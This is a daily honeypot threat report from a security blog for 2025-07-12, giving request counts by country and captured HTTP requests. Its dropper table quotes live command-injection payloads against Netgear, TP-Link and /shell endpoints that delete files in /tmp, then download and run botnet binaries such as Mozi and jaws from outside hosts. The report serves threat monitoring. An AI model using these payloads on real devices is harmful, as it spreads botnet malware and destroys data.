Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-07-12

·389 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-12
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 12 stage 1 IP address(es), linked to 6 dropper URL(s).

There are 12 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1241 requests were recorded during the day, originating from 12 different countries, with a peak of 225 requests coming from DE.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
JPGermany
DEGermany
BRGermany
BRGermany
DEGermany
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
8.222.219.91GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
47.100.64.195GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
117.72.66.27GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
36.255.4.827;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
223.155.21.37GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
87.121.84.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-
45.115.89.178GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.115.89.178:59093/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
118.194.249.197GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.135.88GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
36.156.102.59GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
45.135.194.11GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F169.255.72.169%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1
117.72.211.135GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1241GET /shell.aspx HTTP/1.1
2231GET /laravel/vendor/phpunit/phpunit/phpunit.xsd HTTP/1.1
2241GET /public/vendor/phpunit/phpunit/phpunit.xsd HTTP/1.1
2251GET /core/vendor/phpunit/phpunit/phpunit.xsd HTTP/1.1
2261GET /vendor/phpunit/phpunit/phpunit.xsd HTTP/1.1
4201GET /Nmap/folder/check1752313936 HTTP/1.1
4251GET /NmapUpperCheck1752313936 HTTP/1.1
4331GET /OEXp HTTP/1.1
4361GET /nmaplowercheck1752313936 HTTP/1.1
4741GET /rs/application-about HTTP/1.1
4751GET /json/login_session HTTP/1.1
4761GET /photo/webapi/query.php?api=SYNO.API.Info&method=query&version=1 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0225DE
1179US
2167CN
3150GB
486FR
583RU
656HK
755SG
842PL
934KR
1030NL
1128ZA
1216BG
1312GH
1411SC
158MU
168BR
177UA
185BE
195JP
204AO
214SE
224IN
233KZ
242AU
252AE
262LV
272LA
282IL
292ES
302IE
311NG
321AR
331TH
341EE
351MK

Related

Report: 2025-07-11
·371 words
Repport Daily
Report: 2025-07-10
·326 words
Repport Daily
Report: 2025-07-09
·338 words
Repport Daily